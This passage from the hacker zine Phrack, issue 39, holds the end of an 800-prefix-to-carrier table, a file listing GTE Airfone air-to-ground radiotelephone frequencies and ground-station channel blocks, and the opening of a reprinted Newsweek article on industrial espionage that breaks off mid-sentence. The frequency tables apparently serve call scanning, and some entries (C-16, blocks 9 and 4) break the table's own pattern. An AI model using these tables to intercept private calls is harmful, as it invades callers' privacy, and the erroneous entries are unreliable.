437 ATX AT&T-C
438 ATX AT&T-C
439 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
440 TXN TEX-NET
441 ATX AT&T-C
442 ATX AT&T-C
443 ATX AT&T-C
444 MCI MCI TELECOMMUNICATIONS CORPORATION
445 ATX AT&T-C
446 ATX AT&T-C
447 ATX AT&T-C
448 ATX AT&T-C
449 UTD UNITED TELCO / TELAMAR
450 USL US LINK LONG DISTANCE
451 ATX AT&T-C
452 ATX AT&T-C
453 ATX AT&T-C
454 ALN ALLNET COMMUNICATIONS SERVICES
455 LDG LDD, INC.
456 MCI MCI TELECOMMUNICATIONS CORPORATION
457 ATX AT&T-C
458 ATX AT&T-C
459 9631 NORTHWEST BELL
460 NTX NATIONAL TELEPHONE EXCHANGE
461 CAN TELCOM CANADA
462 ATX AT&T-C
463 CAN TELCOM CANADA
464 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
465 CAN TELCOM CANADA
466 ALN ALLNET COMMUNICATIONS SERVICES
467 LDD LDDS COMMUNICATIONS
468 ATX AT&T-C
469 IAS IOWA NETWORK SERVICES
471 ALN ALLNET COMMUNICATIONS SERVICES
472 ATX AT&T-C
473 UTC US TELCOM, INC./US SPRINT
474 32V1 VIRGIN ISLAND TELEPHONE
475 TDD MCI / TELECONNECT
476 SNT MCI / TDD / SOUTHERNNET, INC.
477 MCI MCI TELECOMMUNICATIONS CORPORATION
478 AAM ALASCOM
479 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
481 1186 GTE/NORTH
482 ATX AT&T-C
483 0328 GTE/FLORIDA
484 TDD MCI / TELECONNECT
485 TDD MCI / TELECONNECT
486 TDX CABLE & WIRELESS COMMUNICATIONS
487 UTC US TELCOM, INC./US SPRINT
488 UTC US TELCOM, INC./US SPRINT
489 LDD LDDS COMMUNICATIONS
492 ATX AT&T-C
493 IPC INTERNATION PACIFIC
494 NWR NETWORK TELEPHONE SERVICE
495 JNT J-NET COMMUNICATIONS
496 TRA3 TRAFFIC ROUTING ADMINISTRATION 3
502 RCCP RADIO COMMON CARRIER PAGING
512 RCCP RADIO COMMON CARRIER PAGING
520 PCD PENTAGON COMPUTER DATA, LTD.
521 ATX AT&T-C
522 ATX AT&T-C
523 ATX AT&T-C
524 ATX AT&T-C
525 ATX AT&T-C
526 ATX AT&T-C
527 ATX AT&T-C
528 ATX AT&T-C
529 MIT MIDCO COMMUNICATIONS
530 VRT VARTEC NATIONAL, INC.
531 ATX AT&T-C
532 ATX AT&T-C
533 ATX AT&T-C
534 TRA3 TRAFFIC ROUTING ADMINISTRATION 3
535 ATX AT&T-C
536 ALN ALLNET COMMUNICATIONS SERVICES
537 ATX AT&T-C
538 ATX AT&T-C
539 FNE FIRST PHONE
540 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
541 ATX AT&T-C
542 ATX AT&T-C
543 ATX AT&T-C
544 ATX AT&T-C
545 ATX AT&T-C
546 UTC US TELCOM, INC./US SPRINT
547 ATX AT&T-C
548 ATX AT&T-C
549 CBU CALL AMERICA
550 CMA CALL-AMERICA
551 ATX AT&T-C
552 ATX AT&T-C
553 ATX AT&T-C
554 ATX AT&T-C
555 ATX AT&T-C
556 ATX AT&T-C
557 ALN ALLNET COMMUNICATIONS SERVICES
558 ATX AT&T-C
561 CAN TELCOM CANADA
562 ATX AT&T-C
563 CAN TELCOM CANADA
564 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
565 CAN TELCOM CANADA
566 ALN ALLNET COMMUNICATIONS SERVICES
567 CAN TELCOM CANADA
568 MCI MCI TELECOMMUNICATIONS CORPORATION
569 TEN TELESPHERE NETWORK
572 ATX AT&T-C
574 AMM ACCESS LONG DISTANCE
575 AOI UNITED COMMUNICATIONS, INC.
577 GTS TELENET COMMUNICATIONS CORPORATION
579 LNS LINTEL SYSTEMS
580 WES WESTEL
582 ATX AT&T-C
583 TDD MCI / TELECONNECT
584 TDD MCI / TELECONNECT
586 ATC ACTION TELECOM COMPANY
587 LTQ LONG DISTANCE FOR LESS
588 ATC ACTION TELECOM COMPANY
589 LGT LITEL
592 ATX AT&T-C
593 TDD MCI / TELECONNECT
594 TDD MCI / TELECONNECT
595 32P1 PUERTO RICO TELEPHONE
596 TOI TELECOM "OPTIONS" PLUS, INC.
599 LDM LONG DISTANCE MANAGEMENT
602 RCCP RADIO COMMON CARRIER PAGING
612 RCCP RADIO COMMON CARRIER PAGING
621 ATX AT&T-C
622 ATX AT&T-C
623 TRA3 TRAFFIC ROUTING ADMINISTRATION 3
624 ATX AT&T-C
625 NLD NATIONAL DATA CORP
626 ATX AT&T-C
627 MCI MCI TELECOMMUNICATIONS CORPORATION
628 ATX AT&T-C
629 2284 BEEHIVE TELEPHONE
631 ATX AT&T-C
632 ATX AT&T-C
633 ATX AT&T-C
634 ATX AT&T-C
635 ATX AT&T-C
636 CQU CONQUEST COMMUNICATION CORPORATION
637 ATX AT&T-C
638 ATX AT&T-C
639 BUR BURLINGTON TEL
640 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
641 ATX AT&T-C
642 ATX AT&T-C
643 ATX AT&T-C
644 CMA CALL-AMERICA
645 ATX AT&T-C
646 UTT UNION TELEPHONE COMPANY
647 ATX AT&T-C
648 ATX AT&T-C
649 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
652 ATX AT&T-C
654 ATX AT&T-C
655 ESM EXECULINE OF SACRAMENTO, INC.
656 AVX AMVOX
657 TDD MCI / TELECONNECT
658 TDD MCI / TELECONNECT
659 UTC US TELCOM, INC./US SPRINT
660 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
661 CAN TELCOM CANADA
662 ATX AT&T-C
663 CAN TELCOM CANADA
664 MCI MCI TELECOMMUNICATIONS CORPORATION
665 CAN TELCOM CANADA
666 MCI MCI TELECOMMUNICATIONS CORPORATION
667 CAN TELCOM CANADA
668 CAN TELCOM CANADA
669 UTC US TELCOM, INC./US SPRINT
672 ATX AT&T-C
673 SNT MCI / TDD / SOUTHERNNET, INC.
674 TDD MCI / TELECONNECT
675 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
676 UTC US TELCOM, INC./US SPRINT
677 MCI MCI TELECOMMUNICATIONS CORPORATION
678 MCI MCI TELECOMMUNICATIONS CORPORATION
679 VOB TRANS-NET, INC.
680 2408 PACIFIC TELCOM
682 ATX AT&T-C
683 MTD METROMEDIA LONG DISTANCE
684 NTQ NORTHERN TELECOM, INC.
685 MCI MCI TELECOMMUNICATIONS CORPORATION
686 LGT LITEL
687 NTS NTS COMMUNICATIONS
688 MCI MCI TELECOMMUNICATIONS CORPORATION
689 NWS NORTHWEST TELCO
691 32D1 DOMIN REPUBLIC TELEPHONE
692 ATX AT&T-C
693 JJJ TRI-J
694 TZC TELESCAN
695 MCI MCI TELECOMMUNICATIONS CORPORATION
696 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
698 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
699 PLG PILGRIM TELEPHONE CO.
702 RCCP RADIO COMMON CARRIER PAGING
712 RCCP RADIO COMMON CARRIER PAGING
720 TGN TELEMANAGEMENT CONSULT'T CORP
721 FLX FLEX COMMUNICATIONS
722 ATX AT&T-C
723 MCI MCI TELECOMMUNICATIONS CORPORATION
724 RTC RCI CORPORATION
725 ATL ATC
726 UTC US TELCOM, INC./US SPRINT
727 MCI MCI TELECOMMUNICATIONS CORPORATION
728 TDD MCI / TELECONNECT
729 UTC US TELCOM, INC./US SPRINT
732 ATX AT&T-C
733 UTC US TELCOM, INC./US SPRINT
734 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
735 UTC US TELCOM, INC./US SPRINT
736 UTC US TELCOM, INC./US SPRINT
737 MEC MERCURY, INC.
738 MEC MERCURY, INC.
741 ATL ATC
742 ATX AT&T-C
743 UTC US TELCOM, INC./US SPRINT
744 TRA3 TRAFFIC ROUTING ADMINISTRATION 3
745 UTC US TELCOM, INC./US SPRINT
746 FTC FTC COMMUNICATIONS, INCORPORATION
747 TDD MCI / TELECONNECT
748 TDD MCI / TELECONNECT
749 ATL ATC
752 ATX AT&T-C
753 MCI MCI TELECOMMUNICATIONS CORPORATION
754 TSH TEL-SHARE
755 UTC US TELCOM, INC./US SPRINT
756 MCI MCI TELECOMMUNICATIONS CORPORATION
757 TID TMC OF SOUTH CENTRAL INDIANA
759 MCI MCI TELECOMMUNICATIONS CORPORATION
761 ACX ALTERNATE COMMUNICATIONS TECHNOLOGY
762 ATX AT&T-C
763 TON TOUCH & SAVE
764 AAM ALASCOM
765 MCI MCI TELECOMMUNICATIONS CORPORATION
766 MCI MCI TELECOMMUNICATIONS CORPORATION
767 UTC US TELCOM, INC./US SPRINT
768 SNT MCI / TDD / SOUTHERNNET, INC.
770 3300 GENERAL COMMUNICATIONS
771 SNT MCI / TDD / SOUTHERNNET, INC.
772 ATX AT&T-C
773 CUX COMPU-TEL INC.
774 TTQ TTE OF CHARLESTON
776 UTC US TELCOM, INC./US SPRINT
777 MCI MCI TELECOMMUNICATIONS CORPORATION
778 EDS ELECTRONIC DATA SYSTEMS CORPORATION
779 TDD MCI / TELECONNECT
780 SNT MCI / TDD / SOUTHERNNET, INC.
782 ATX AT&T-C
783 ALN ALLNET COMMUNICATIONS SERVICES
784 ALG AMERICAN LONG LINE
785 SNH SUNSHINE TELEPHONE CO.
786 0341 UNITED/FLORIDA
787 MAD MID ATLANTIC TELECOM
788 UTC US TELCOM, INC./US SPRINT
789 TMU TEL-AMERICA, INC.
792 ATX AT&T-C
794 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
797 TAM TMC OF SOUTH CENTRAL INDIANA
798 TDD MCI / TELECONNECT
800 UTC US TELCOM, INC./US SPRINT
802 RCCP RADIO COMMON CARRIER PAGING
807 NTI NETWORK TELECOMMUNICATIONS
808 AAX AMERITECH AUDIOTEX SERVICES
812 RCCP RADIO COMMON CARRIER PAGING
821 ATX AT&T-C
822 ATX AT&T-C
823 THA TOUCH AMERICA
824 ATX AT&T-C
825 MCI MCI TELECOMMUNICATIONS CORPORATION
826 ATX AT&T-C
827 UTC US TELCOM, INC./US SPRINT
828 ATX AT&T-C
829 UTC US TELCOM, INC./US SPRINT
831 ATX AT&T-C
832 ATX AT&T-C
833 ATX AT&T-C
834 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
835 ATX AT&T-C
836 TDD MCI / TELECONNECT
837 TDD MCI / TELECONNECT
838 0567 UNITED/INT MN
839 VST STAR-LINE
841 ATX AT&T-C
842 ATX AT&T-C
843 ATX AT&T-C
844 LDD LDDS COMMUNICATIONS
845 ATX AT&T-C
846 MCI MCI TELECOMMUNICATIONS CORPORATION
847 ATX AT&T-C
848 ATX AT&T-C
849 BTM BUSINESS TELECOM, INC.
850 TKC TK COMMUNICATIONS
851 ATX AT&T-C
852 ATX AT&T-C
853 UTY UNIVERSAL COMMUNICATIONS
854 ATX AT&T-C
855 ATX AT&T-C
857 TDD MCI / TELECONNECT
858 ATX AT&T-C
860 VNS VIRTUAL NETWORK
862 ATX AT&T-C
863 ALN ALLNET COMMUNICATIONS SERVICES
864 TEN TELESPHERE NETWORK
865 3100 HAWAIIAN TELEPHONE
866 MCI MCI TELECOMMUNICATIONS CORPORATION
867 RBL VORTEL
868 SNT MCI / TDD / SOUTHERNNET, INC.
869 UTC US TELCOM, INC./US SPRINT
871 TXL DIGITAL NETWORK, INC.
872 ATX AT&T-C
873 MCI MCI TELECOMMUNICATIONS CORPORATION
874 ATX AT&T-C
875 ALN ALLNET COMMUNICATIONS SERVICES
876 MCI MCI TELECOMMUNICATIONS CORPORATION
877 UTC US TELCOM, INC./US SPRINT
878 ALN ALLNET COMMUNICATIONS SERVICES
879 MCI MCI TELECOMMUNICATIONS CORPORATION
880 NTV NATIONAL TELECOMMUNICATIONS
881 NTV NATIONAL TELECOMMUNICATIONS
882 ATX AT&T-C
883 TDX CABLE & WIRELESS COMMUNICATIONS
884 UTC US TELCOM, INC./US SPRINT
885 SDY TELVUE,CORP
886 ALN ALLNET COMMUNICATIONS SERVICES
887 ETS EASTERN TELEPHONE SYSTEMS, INC.
888 MCI MCI TELECOMMUNICATIONS CORPORATION
889 2408 PACIFIC TELCOM
890 ATZ ATX-COMMUNICATIONS
891 TVT TMC COMMUNICATIONS
892 ATX AT&T-C
896 TXN TEX-NET
898 CGI COMMUNICATIONS GROUP OF JACKSON
899 TDX CABLE & WIRELESS COMMUNICATIONS
902 RCCP RADIO COMMON CARRIER PAGING
908 AAX AMERITECH AUDIOTEX SERVICES
912 RCCP RADIO COMMON CARRIER PAGING
922 ATX AT&T-C
923 ALN ALLNET COMMUNICATIONS SERVICES
924 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
925 MCI MCI TELECOMMUNICATIONS CORPORATION
926 MCI MCI TELECOMMUNICATIONS CORPORATION
927 UTC US TELCOM, INC./US SPRINT
928 ALU AMERICALL SYSTEMS - LOUISIANNA
932 ATX AT&T-C
933 MCI MCI TELECOMMUNICATIONS CORPORATION
934 MCI MCI TELECOMMUNICATIONS CORPORATION
936 RBW R-COMM
937 MCI MCI TELECOMMUNICATIONS CORPORATION
939 TZX TELENATIONAL COMMUNICATIONS
940 TSF ATC / SOUTH TEL
942 ATX AT&T-C
943 AUU AUS, INC.
944 MCI MCI TELECOMMUNICATIONS CORPORATION
945 MCI MCI TELECOMMUNICATIONS CORPORATION
946 API PHONE ONE - AMERICAN PIONEER TELEPHONE
947 MCI MCI TELECOMMUNICATIONS CORPORATION
948 PHX PHOENIX NETWORK
950 MCI MCI TELECOMMUNICATIONS CORPORATION
951 BML PHONE AMERICA
952 ATX AT&T-C
955 MCI MCI TELECOMMUNICATIONS CORPORATION
960 CNO COMTEL OF NEW ORLEANS
962 ATX AT&T-C
963 SOC STATE OF CALIFORNIA
964 MCI MCI TELECOMMUNICATIONS CORPORATION
965 TLX TMC OF LEXINGTON
966 TDX CABLE & WIRELESS COMMUNICATIONS
967 MCI MCI TELECOMMUNICATIONS CORPORATION
968 TED TELEDIAL AMERICA
969 TDX CABLE & WIRELESS COMMUNICATIONS
972 ATX AT&T-C
980 VLW VALU-LINE OF LONGVIEW, INC.
981 32P1 PUERTO RICO TELEPHONE
982 ATX AT&T-C
983 WUT WESTERN UNION TELEGRAPH CO.
986 WUT WESTERN UNION TELEGRAPH CO.
987 BTL BITTEL TELECOMMUNICATIONS CORPORATION
988 TDD MCI / TELECONNECT
989 TDX CABLE & WIRELESS COMMUNICATIONS
990 FEB FEB CORPORATION
992 ATX AT&T-C
993 LKS ?
996 VOA VALU-LINE
999 MCI MCI TELECOMMUNICATIONS CORPORATION
_______________________________________________________________________________

==Phrack Inc.==

Volume Four, Issue Thirty-Nine, File 8 of 13

Air Fone Frequencies


by Leroy Donnelly
Leroy.Donnelly@IVGATE.OMAHUG.ORG

This is a quick file on the subject of what frequencies are used for Air Fone
Telephone while in-flight air-to-ground. The following should give you some an
understanding of how it all works.

The FCC has issued rules on allocation of the 849-851/894-895 MHz bands for
air-ground radiotelephone service.

The most recent action was effective September 9, 1991:

1) Changed channel spacing from GTE Airfone Inc.'s de facto standards;

2) Ordered GTE to make its service available to other air-ground licensees


at non-discriminatory rates;

3) Divided each channel block into 6 control channels (P-1 through P-6)
and 29 communications channels (C-1 through C-29);

4) Provided for a communications channel bandwidth of 6 kHz;

5) Gave GTE 22 months to modify its current control channel scheme; during
this period, GTE can use the lower 20 kHz of each channel block, which
includes channels C-1, C-2, and C-3, for control. GTE then has another
38 months during which it can only use a 3.2 kHz control channel in
channel C-2 of each channel block. After these transition periods end
(September of 1996), GTE must switch to control channels marked P-1
through P-6 in the tables below;

6) Empowered the FCC to assign exclusively one control channel to each


air-ground licensee;

7) Limited the ERP of airborne stations to 30 watts maximum; and that of


ground stations to 100 watts maximum;

8) Limited the ERP of ground stations to 1 watt when communicating with


aircraft on the ground.

GROUND TO AIR CHANNELS

(NOTE: "GB" in these listings denotes Guard Band, a series of 3 kHz spacings
to separate communications channels from control channels.)

CH. # CHANNEL BLOCK

10 9 8 7 6
C-1 849.0055 849.2055 849.4055 849.6055 849.8055
C-2 849.0115 849.2115 849.4115 849.6115 849.8115
C-3 849.0175 849.2175 849.4175 849.6175 849.8175
C-4 849.0235 849.2235 849.4235 849.6235 849.8235
C-5 849.0295 849.2295 849.4295 849.6295 849.8295
C-6 849.0355 849.2355 849.4355 849.6355 849.8355
C-7 849.0415 849.2415 849.4415 849.6415 849.8415
C-8 849.0475 849.2475 849.4475 849.6475 849.8475
C-9 849.0535 849.2535 849.4535 849.6535 849.8535
C-10 849.0595 849.2595 849.4595 849.6595 849.8595
C-11 849.0655 849.2655 849.4655 849.6655 849.8655
C-12 849.0715 849.2715 849.4715 849.6715 849.8715
C-13 849.0775 849.2775 849.4775 849.6775 849.8775
C-14 849.0835 849.2835 849.4835 849.6835 849.8835
C-15 849.0895 849.2895 849.4895 849.6895 849.8895
C-16 849.0955 849.2855 849.4955 849.6955 849.8955
C-17 849.1015 849.3015 849.5015 849.7015 849.9015
C-18 849.1075 849.3075 849.5075 849.7075 849.9075
C-19 849.1135 849.3135 849.5135 849.7135 849.9135
C-20 849.1195 849.3195 849.5195 849.7195 849.9195
C-21 849.1255 849.3255 849.5255 849.7255 849.9255
C-22 849.1315 849.3315 849.5315 849.7315 849.9315
C-23 849.1375 849.3375 849.5375 849.7375 849.9375
C-24 849.1435 849.3435 849.5435 849.7435 849.9435
C-25 849.1495 849.3495 849.5495 849.7495 849.9495
C-26 849.1555 849.3555 849.5555 849.7555 849.9555
C-27 849.1615 849.3615 849.5615 849.7615 849.9615
C-28 849.1675 849.3675 849.5675 849.7675 849.9675
C-29 849.1735 849.3735 849.5735 849.7735 849.9735
GB 849.1765 849.3765 849.5765 849.7765 849.9765
to to to to to
849.1797 849.3797 849.5797 849.7797 849.9797
P-6 849.1813 849.3813 849.5813 849.7813 849.9813
P-5 849.1845 849.3845 849.5845 849.7845 849.9845
P-4 849.1877 849.3877 849.5877 849.7877 849.9877
P-3 849.1909 849.3909 849.5909 849.7909 849.9909
P-2 849.1941 849.3941 849.5941 849.7941 849.9941
P-1 849.1973 849.3973 849.5973 849.7973 849.9973

5 4 3 2 1
C-1 850.0055 850.2055 850.4055 850.6055 850.8055
C-2 850.0115 850.2115 850.4115 850.6115 850.8115
C-3 850.0175 850.2175 850.4175 850.6175 850.8175
C-4 850.0235 850.2235 850.4235 850.6235 850.8235
C-5 850.0295 850.2295 850.4295 850.6295 850.8295
C-6 850.0355 850.2355 850.4355 850.6355 850.8355
C-7 850.0415 850.2415 850.4415 850.6415 850.8415
C-8 850.0475 850.2475 850.4475 850.6475 850.8475
C-9 850.0535 850.2535 850.4535 850.6535 850.8535
C-10 850.0595 850.2595 850.4595 850.6595 850.8595
C-11 850.0655 850.2655 850.4655 850.6655 850.8655
C-12 850.0715 850.2715 850.4715 850.6715 850.8715
C-13 850.0775 850.2775 850.4775 850.6775 850.8775
C-14 850.0835 850.2835 850.4835 850.6835 850.8835
C-15 850.0895 850.2895 850.4895 850.6895 850.8895
C-16 850.0955 850.2855 850.4955 850.6955 850.8955
C-17 850.1015 850.3015 850.5015 850.7015 850.9015
C-18 850.1075 850.3075 850.5075 850.7075 850.9075
C-19 850.1135 850.3135 850.5135 850.7135 850.9135
C-20 850.1195 850.3195 850.5195 850.7195 850.9195
C-21 850.1255 850.3255 850.5255 850.7255 850.9255
C-22 850.1315 850.3315 850.5315 850.7315 850.9315
C-23 850.1375 850.3375 850.5375 850.7375 850.9375
C-24 850.1435 850.3435 850.5435 850.7435 850.9435
C-25 850.1495 850.3495 850.5495 850.7495 850.9495
C-26 850.1555 850.3555 850.5555 850.7555 850.9555
C-27 850.1615 850.3615 850.5615 850.7615 850.9615
C-28 850.1675 850.3675 850.5675 850.7675 850.9675
C-29 850.1735 850.3735 850.5735 850.7735 850.9735
GB 850.1765 850.3765 850.5765 850.7765 850.9765
to to to to to
850.1797 850.3797 850.5797 850.7797 850.9797
P-6 850.1813 850.3813 850.5813 850.7813 850.9813
P-5 850.1845 850.3845 850.5845 850.7845 850.9845
P-4 850.1877 850.3877 850.5877 850.7877 850.9877
P-3 850.1909 850.3909 850.5909 850.7909 850.9909
P-2 850.1941 850.3941 850.5941 850.7941 850.9941
P-1 850.1973 850.3973 850.5973 850.7973 850.9973

AIR TO GROUND CHANNELS

CH. # CHANNEL BLOCK


10 9 8 7 6
C-1 894.0055 894.2055 894.4055 894.6055 894.8055
C-2 894.0115 894.2115 894.4115 894.6115 894.8115
C-3 894.0175 894.2175 894.4175 894.6175 894.8175
C-4 894.0235 894.2235 894.4235 894.6235 894.8235
C-5 894.0295 894.2295 894.4295 894.6295 894.8295
C-6 894.0355 894.2355 894.4355 894.6355 894.8355
C-7 894.0415 894.2415 894.4415 894.6415 894.8415
C-8 894.0475 894.2475 894.4475 894.6475 894.8475
C-9 894.0535 894.2535 894.4535 894.6535 894.8535
C-10 894.0595 894.2595 894.4595 894.6595 894.8595
C-11 894.0655 894.2655 894.4655 894.6655 894.8655
C-12 894.0715 894.2715 894.4715 894.6715 894.8715
C-13 894.0775 894.2775 894.4775 894.6775 894.8775
C-14 894.0835 894.2835 894.4835 894.6835 894.8835
C-15 894.0895 894.2895 894.4895 894.6895 894.8895
C-16 894.0955 894.2855 894.4955 894.6955 894.8955
C-17 894.1015 894.3015 894.5015 894.7015 894.9015
C-18 894.1075 894.3075 894.5075 894.7075 894.9075
C-19 894.1135 894.3135 894.5135 894.7135 894.9135
C-20 894.1195 894.3195 894.5195 894.7195 894.9195
C-21 894.1255 894.3255 894.5255 894.7255 894.9255
C-22 894.1315 894.3315 894.5315 894.7315 894.9315
C-23 894.1375 894.3375 894.5375 894.7375 894.9375
C-24 894.1435 894.3435 894.5435 894.7435 894.9435
C-25 894.1495 894.3495 894.5495 894.7495 894.9495
C-26 894.1555 894.3555 894.5555 894.7555 894.9555
C-27 894.1615 894.3615 894.5615 894.7615 894.9615
C-28 894.1675 894.3675 894.5675 894.7675 894.9675
C-29 894.1735 894.3735 894.5735 894.7735 894.9735
GB 894.1765 894.3765 894.5765 894.7765 894.9765
to to to to to
894.1797 894.3797 894.5797 894.7797 894.9797
P-6 894.1813 894.3813 894.5813 894.7813 894.9813
P-5 894.1845 894.3845 894.5845 894.7845 894.9845
P-4 894.1877 894.3877 894.5877 894.7877 894.9877
P-3 894.1909 894.3909 894.5909 894.7909 894.9909
P-2 894.1941 894.3941 894.5941 894.7941 894.9941
P-1 894.1973 894.3973 894.5973 894.7973 894.9973
5 4 3 2 1
C-1 895.0055 895.2055 895.4055 895.6055 895.8055
C-2 895.0115 895.2115 895.4115 895.6115 895.8115
C-3 895.0175 895.2175 895.4175 895.6175 895.8175
C-4 895.0235 895.2235 895.4235 895.6235 895.8235
C-5 895.0295 895.2295 895.4295 895.6295 895.8295
C-6 895.0355 895.2355 895.4355 895.6355 895.8355
C-7 895.0415 895.2415 895.4415 895.6415 895.8415
C-8 895.0475 895.2475 895.4475 895.6475 895.8475
C-9 895.0535 895.2535 895.4535 895.6535 895.8535
C-10 895.0595 895.2595 895.4595 895.6595 895.8595
C-11 895.0655 895.2655 895.4655 895.6655 895.8655
C-12 895.0715 895.2715 895.4715 895.6715 895.8715
C-13 895.0775 895.2775 895.4775 895.6775 895.8775
C-14 895.0835 895.2835 895.4835 895.6835 895.8835
C-15 895.0895 895.2895 895.4895 895.6895 895.8895
C-16 895.0955 895.2855 895.4955 895.6955 895.8955
C-17 895.1015 895.3015 895.5015 895.7015 895.9015
C-18 895.1075 895.3075 895.5075 895.7075 895.9075
C-19 895.1135 895.3135 895.5135 895.7135 895.9135
C-20 895.1195 895.3195 895.5195 895.7195 895.9195
C-21 895.1255 895.3255 895.5255 895.7255 895.9255
C-22 895.1315 895.3315 895.5315 895.7315 895.9315
C-23 895.1375 895.3375 895.5375 895.7375 895.9375
C-24 895.1435 895.3435 895.5435 895.7435 895.9435
C-25 895.1495 895.3495 895.5495 895.7495 895.9495
C-26 895.1555 895.3555 895.5555 895.7555 895.9555
C-27 895.1615 895.3615 895.5615 895.7615 895.9615
C-28 895.1675 895.3675 895.5675 895.7675 895.9675
C-29 895.1735 895.3735 895.5735 895.7735 895.9735
GB 895.1765 895.3765 895.5765 895.7765 895.9765
to to to to to
895.1797 895.3797 895.5797 895.7797 895.9797
P-6 895.1813 895.3813 895.5813 895.7813 895.9813
P-5 895.1845 895.3845 895.5845 895.7845 895.9845
P-4 895.1877 895.3877 895.5877 895.7877 895.9877
P-3 895.1909 895.3909 895.5909 895.7909 895.9909
P-2 895.1941 895.3941 895.5941 895.7941 895.9941
P-1 895.1973 895.3973 895.5973 895.7973 895.9973

GEOGRAPHICAL CHANNEL BLOCK LAYOUT

(Ground stations using the same channel block must be at least 300 miles apart)

LOCATION CH. BLOCK


ALASKA
Anchorage 8
Cordova 5
Ketchikan 5
Juneau 4
Sitka 7
Yakutat 8
ALABAMA
Birmingham 2
ARIZONA
Phoenix 4
Winslow 6
ARKANSAS
Pine Bluff 8
CALIFORNIA
Blythe 10
Eureka 8
Los Angeles 4
Oakland 1
S. San Fran. 6
Visalia 7
COLORADO
Colorado Spgs. 8
Denver 1
Hayden 6
FLORIDA
Miami 4
Orlando 2
Tallahassee 7
GEORGIA
Atlanta 5
St. Simons Is. 6
HAWAII
Mauna Kapu 5
IDAHO
Blackfoot 8
Caldwell 10
ILLINOIS
Chicago 3
Kewanee 5
Schiller Park 2
INDIANA
Fort Wayne 7
IOWA
Des Moines 1
KANSAS
Garden City 3
Wichita 7
KENTUCKY
Fairdale 6
LOUISIANA
Kenner 3
Shreveport 5
MASSACHUSETTS
Boston 7
MICHIGAN
Bellville 8
Flint 9
Sault S. Marie 6
MINNESOTA
Bloomington 9
MISSISSIPPI
Meridian 9
MISSOURI
Kansas City 6
St. Louis 4
Springfield 9
MONTANA
Lewistown 5
Miles City 8
Missoula 3
NEBRASKA
Grand Island 2
Ogallala 4
NEVADA
Las Vegas 1
Reno 3
Tonopah 9
Winnemucca 4
NEW MEXICO
Alamogordo 8
Albuquerque 10
Aztec 9
Clayton 5
NEW JERSEY
Woodbury 3
NEW YORK
E. Elmhurst 1
Schuyler 2
Staten Island 9
NORTH CAROLINA
Greensboro 9
Wilmington 3
NORTH DAKOTA
Dickinson 7
OHIO
Pataskala 1
OKLAHOMA
Warner 4
Woodward 9
OREGON
Albany 5
Klamath Falls 2
Pendleton 7
PENNSYLVANIA
Coraopolis 4
New Cumberland 8
SOUTH CAROLINA
Charleston 4
SOUTH DAKOTA
Aberdeen 6
Rapid City 5
TENNESSEE
Elizabethton 7
Memphis 10
Nashville 3
TEXAS
Austin 2
Bedford 1
Houston 9
Lubbock 7
Monahans 6
UTAH
Abajo Peak 7
Delta 2
Escalante 5
Green River 3
Salt Lake City 1
VIRGINIA
Arlington 6
WASHINGTON
Seattle 4
Cheney 1
WEST VIRGINIA
Charleston 2
WISCONSIN
Stevens Point 8
WYOMING
Riverton 9
_______________________________________________________________________________

==Phrack Inc.==

Volume Four, Issue Thirty-Nine, File 9 of 13

THE OPEN BARN DOOR

U.S. Firms Face A Wave Of Foreign Espionage

By Douglas Waller
Newsweek, May 4, 1992, Page 58

It's tough enough these days for American companies to compete with their
Pacific Rim rivals, even when the playing field is level. It's a lot tougher
when your trade secrets are peddled by competitors. One Dallas computer
maker, for example, recently spotted its sensitive pricing information in the
bids of a South Korean rival. The firm hired a detective agency, Phoenix
Investigations, which found an innocent-looking plastic box in a closet at its
headquarters. Inside was a radio transmitter wired to a cable connected to a
company fax machine. The bug had been secretly installed by a new worker -- a
mole planted by the Korean company. "American companies don't believe this
kind of stuff can happen," says Phoenix president Richard Aznaran. "By the
time they come to us the barn door is wide open."

Welcome to a world order where profits have replaced missiles as the


currency of power. Industrial espionage isn't new, and it isn't always
illegal, but as firms develop global reach, they are acquiring new
vulnerability to economic espionage. In a survey by the American Society for
Industrial Security last year, 37 percent of the 165 U.S. firms responding said
they had been targets of spying. The increase has been so alarming that both
the CIA and the FBI have beefed up their economic counterintelligence programs.
The companies are mounting more aggressive safeguards, too. Kellog Company has
halted public tours at its Battle Creek, Michigan, facility because spies were
slipping in to photograph equipment. Eastman Kodak Company classifies
documents, just like the government. Lotus Development Corporation screens
cleaning crews that work at night. "As our computers become smaller, it's
easier for someone to walk off with one," says Lotus spokesperson Rebecca Seel.

To be sure, some U.S. firms have been guilty of espionage themselves --


though they tend not to practice it overseas, because foreign companies have a
tighter hold on their secrets. And American companies now face an additional
hazard: The professional spy services of foreign nations. "We're finding
intelligence organizations from countries we've never looked at before who are
active in the U.S.," says the FBI's R. Patrick Watson. Foreign intelligence
agencies traditionally thought friendly to the United States "are trying to
plant moles in American high-tech companies [and] search the briefcases of
American business men traveling overseas," warns CIA Director Robert Gates.
Adds Noell Matchett, a former National Security Agency official: "What we've
got is this big black hole of espionage going on all over the world and a naive
set of American business people being raped."

No one knows quite how much money U.S. businesses lost to this black hole.
Foreign governments refuse to comment on business intelligence they collect.
The victims rarely publicize the espionage or report it to authorities for fear
of exposing vulnerabilities to stockholders. But more than 30 companies and
security experts NEWSWEEK contacted claimed billions of dollars are lost
annually from stolen trade secrets and technology. This week a House Judiciary
subcommittee is holding hearings to assess the damage. IBM, which has been
targeted by French and Japanese intelligence operations, estimates $1 billion
lost from economic espionage and software piracy. IBM won't offer specifics,
but says that the espionage "runs the gamut from items missing off loading
docks to people looking over other people's shoulders in airplanes."

Most brazen: France's intelligence service, the Direction Generale de la


Securite Exterieure (DGSE), has been the most brazen about economic espionage,
bugging seats of businessmen flying on airliners and ransacking their hotel
rooms for documents, say intelligence sources. Three years ago the FBI
